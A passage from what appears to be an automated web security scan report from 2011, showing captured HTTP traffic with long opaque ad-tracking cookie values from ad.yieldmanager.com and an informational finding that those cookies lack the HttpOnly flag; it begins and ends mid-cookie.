%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 302 Found
Date: Fri, 22 Jul 2011 20:31:12 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%2!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-lG!!!!#=-A%4!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Sun, 21-Jul-2013 20:31:12 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=jePjCI320wMQq5e67QM&guid=ON&script=0
Cache-Control: no-store
Last-Modified: Fri, 22 Jul 2011 20:31:12 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

11.45. http://ad.yieldmanager.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%2!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b